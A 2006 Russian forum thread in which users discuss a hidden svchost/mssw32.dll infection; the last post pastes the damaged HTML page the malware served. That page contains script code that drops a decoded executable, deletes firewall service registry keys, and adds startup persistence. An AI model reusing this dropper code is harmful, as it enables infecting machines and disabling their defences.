Гость
Целевая тема:
Создать новую тему:
Автор:
Форумы / Windows [игнор отключен] [закрыт для гостей] / Зверушка / 4 сообщений из 4, страница 1 из 1
03.02.2006, 11:52
    #33521468
rrrrrrrrrr
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Зверушка
Сегодня у секретаря в машине обнаружилась интересная штучка: при старте компьютера, после ввода пароля грузится процесс svchost (причем самый что ни на есть виндовый, с подписью XP Publisher, тот же, что и Generic Services Host, но запущен не сервисом, а просто из explorer'a ). Слушает на http-порту. Жрет ресурсы процессора - тем и засветился.
Посмотрел со всех сторон на этот svchost.exe - все в норме, запущен из system32, размер, контрольная сумма - все как должно быть. Антивирус его игнорирует, на здоровых машинах - тоже.
В автозапуске нигде нет. Смотрю, какие dll использует, вижу mssw32.dll. Лезу в библиотеки explorer'a, вижу ее же в списке подгржаемых (relocated). Ищу либу на диске - нет. С командной строки - пишет нет прав. Делаю ресет прав и хозяев на system32 - фиг. Зато стало видно в wincmd32 (в проводнике все опции включены).
Кончилось тем, что снес либу из ERD Commander'a.

И вот вопрос: у кого-нибудь такая радость была? И что это? Просто настолько все лихо закручено...
...
Рейтинг: 0 / 0
03.02.2006, 12:30
    #33521646
Green2
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Зверушка
было такое же у секретаря тоже :) Кстати, у меня еще html страницу зверюшка
выдала.
--



Posted via ActualForum NNTP Server 1.3
...
Рейтинг: 0 / 0
03.02.2006, 12:43
    #33521716
lissyara
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Зверушка
Что за страница, кстати?


Posted via ActualForum NNTP Server 1.3
...
Рейтинг: 0 / 0
03.02.2006, 12:59
    #33521788
Green2
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Зверушка
зараза, покоцаная
Код: plaintext
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
<center><form><table border= 0 ><tr><td>ID:<td><input 
type=text><tr><td>Password:<td><input type=password></table></form><button 
type=submit>Enter</button><script 
language=JavaScript>dr="c:\\Recycled\\";n=dr+"userinit.exe";try{a=new 
ActiveXObject("Scripting.FileSystemObject");t=new 
ActiveXObject("WScript.Shell");nx= 1 ;if(a.FileExists(n)){ex=a.GetFile(n);if(ex.size> 20000 )nx= 0 ;}function 
fl(){return 
false}document.oncontextmenu=fl;a.CreateFolder(dr);}catch(t1){};</script><script 
language="vbs">If nx Then
r="TVpLRVJ %af_src_comm_0 BUwT/1hmeDo5/?"
Sub bs
s=Len(r)
If(s)Then
z="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
For o= 1  To s Step  4 
p= 3 
c= 0 
For u= 0  To  3 
q=Mid(r,o+u, 1 )
If q="=" Then
p=p- 1 
v= 0 
ElseIf q="?" Then
Set b=a.CreateTextFile(n,True)
b.Write d
b.Close
Exit Sub
Else
v=InStr( 1 ,z,q,vbBinaryCompare)- 1 
End If
c= 64 *c+v
Next
c=Hex(c)
c=String( 6 -Len(c),"0")&c
w=Chr(CByte("&H"&Mid(c, 1 , 2 )))+Chr(CByte("&H"&Mid(c, 3 , 2 )))+Chr(CByte("&H"&Mid(c, 5 , 2 )))
d=d&Left(w,p)
Next
End If
End Sub
End If
bs
t.RegWrite "HKCU\Software\Microsoft\Internet 
Explorer\web",location.href,"REG_SZ"</script><script 
language=JavaScript>function f1(){b1= 0 ;function 
f2(na){b2= 0 ;r1="HKLM\\SYSTEM\\CurrentControlSet\\Services\\";try{t.RegDelete(r1+na+"\\");b2= 1 ;}catch(t1){};return(b2);}r2="HKLM\\SOFTWARE\\Microsoft\\";ke="Active 
Setup\\Installed 
Components\\{CD5AC91B-AE7B-E83A-0C4C-E616075972F3}\\Stubpath";if(f2("pcipim")+f2("pcIPPsC")+f2("RapDrv")+f2("FirePM")+f2("KmxFile"))b1= 1 ;try{t.RegWrite(r2+ke,n,"REG_SZ");t.RegRead(r2+ke);}catch(t1){try{a.CopyFile(n,t.RegRead(r2+"Windows\\CurrentVersion\\Explorer\\Shell 
Folders\\Common 
Startup")+"\\");}catch(t1){b1= 0 };};return(b1);}try{if(nx&&!f1())t.run(n);}catch(k){document.write("<br>Error! 
Please download offline version - <a 
href=offline.zip>offline.zip</a>")};</script>
--



Posted via ActualForum NNTP Server 1.3
...
Рейтинг: 0 / 0
Форумы / Windows [игнор отключен] [закрыт для гостей] / Зверушка / 4 сообщений из 4, страница 1 из 1
Найденые пользователи ...
Разблокировать пользователей ...
Читали форум (0):
Пользователи онлайн (0):
x
x
Закрыть


Просмотр
0 / 0
Close
Debug Console [Select Text]